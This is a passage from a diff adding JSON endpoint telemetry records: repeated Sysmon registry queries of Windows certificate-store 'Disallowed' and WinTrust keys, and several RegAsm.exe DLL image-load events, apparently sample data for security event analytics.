+ "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570867930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570867930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570867930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570867930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570867930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570867930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570867930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570867930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570867930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570867930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570867930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570868090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570868090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570868090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570868090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570868090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570868090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570868090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570868090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570868090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570868090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570868090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570868090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570868090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570868090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570868090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570868090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570868090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570868090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570868090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570868090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570868090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570868090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570868090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570868090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "winspool.drv", + "image_path": "C:\\Windows\\SysWOW64\\winspool.drv", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570865119984, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "image_load", + "image_name": "ole32.dll", + "image_path": "C:\\Windows\\SysWOW64\\ole32.dll", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570868090000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570868090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "propsys.dll", + "image_path": "C:\\Windows\\SysWOW64\\propsys.dll", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570865119984, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570868250000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570868250000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570868250000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570868250000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570868250000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570868250000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570868250000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570868250000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570868400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570868400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570868400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570868400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570868400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570868400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570868400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570868400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570868400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570868400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570868400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570868400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570868400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570868400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570868400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570868400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\SysWOW64\\IPHLPAPI.DLL", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570865280000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "image_load", + "image_name": "bcrypt.dll", + "image_path": "C:\\Windows\\SysWOW64\\bcrypt.dll", + "pid": 5012, + "process_name": 